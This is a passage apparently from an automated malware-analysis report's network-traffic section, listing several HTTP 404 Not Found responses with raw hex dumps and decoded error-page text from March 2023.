20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:09:51 GMTServer: ApacheContent-Length: 16056Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:09:54 GMTServer: ApacheContent-Length: 16056Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:10:36 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:10:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:10:41 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 08:10:46 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 6f 71 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /0oqq/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 08:10:49 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 6f 71 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /0oqq/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 08:10:52 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 6f 71 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /0oqq/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 20 Mar 2023 08:10:58 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 20 Mar 2023 08:11:00 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Mon, 20 Mar 2023 08:11:03 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 